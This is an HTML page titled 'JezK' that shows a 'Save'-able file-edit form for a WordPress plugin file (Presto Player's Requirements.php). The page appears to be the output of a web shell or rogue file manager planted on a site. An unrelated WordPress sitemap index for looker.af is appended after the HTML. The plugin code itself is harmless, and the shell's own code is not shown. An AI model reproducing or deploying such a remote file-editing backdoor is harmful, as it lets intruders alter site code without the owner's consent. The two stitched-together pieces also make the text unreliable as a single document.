
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: Requirements.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace PrestoPlayer;

use PrestoPlayer\Mundschenk\WP_Requirements;

class Requirements extends WP_Requirements {

	const REQUIREMENTS = array(
		&#039;php&#039;       =&gt; &#039;7.3&#039;,
		&#039;multibyte&#039; =&gt; false,
		&#039;utf-8&#039;     =&gt; false,
		&#039;wp&#039;        =&gt; &#039;5.6&#039;,
	);

	/**
	 * Creates a new requirements instance.
	 *
	 * @since 2.1.0 Parameter $plugin_file replaced with AVATAR_PRIVACY_PLUGIN_FILE constant.
	 */
	public function __construct() {
		parent::__construct( &#039;Presto Player&#039;, PRESTO_PLAYER_PLUGIN_FILE, &#039;presto-player&#039;, self::REQUIREMENTS );
	}

	/**
	 * Retrieves an array of requirement specifications.
	 *
	 * @return array {
	 *         An array of requirements checks.
	 *
	 *   @type string   $enable_key An index in the $install_requirements array to switch the check on and off.
	 *   @type callable $check      A function returning true if the check was successful, false otherwise.
	 *   @type callable $notice     A function displaying an appropriate error notice.
	 * }
	 */
	protected function get_requirements() {
		$requirements   = parent::get_requirements();
		$requirements[] = array(
			&#039;enable_key&#039; =&gt; &#039;wp&#039;,
			&#039;check&#039;      =&gt; array( $this, &#039;check_wp_support&#039; ),
			&#039;notice&#039;     =&gt; array( $this, &#039;admin_notices_wp_incompatible&#039; ),
		);

		return $requirements;
	}

	/**
	 * Checks for availability of the GD extension.
	 *
	 * @return bool
	 */
	protected function check_wp_support() {
		global $wp_version;
		return version_compare( $wp_version, &#039;5.6&#039;, &#039;&gt;=&#039; );
	}

	/**
	 * Prints &#039;WordPress Update&#039; admin notice
	 *
	 * @return void
	 */
	public function admin_notices_wp_incompatible() {
		$this-&gt;display_error_notice(
			/* translators: 1: plugin name 2: WordPress update documentation URL */
			\__( &#039;The activated plugin %1$s requires WordPress 5.6 or higher. Please update WordPress.&#039;, &#039;presto-player&#039; ),
			&#039;&lt;strong&gt;Presto Player&lt;/strong&gt;&#039;,
			/* translators: URL with WordPress installation instructions */
			\__( &#039;https://wordpress.org/support/article/updating-wordpress/&#039;, &#039;presto-player&#039; )
		);
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
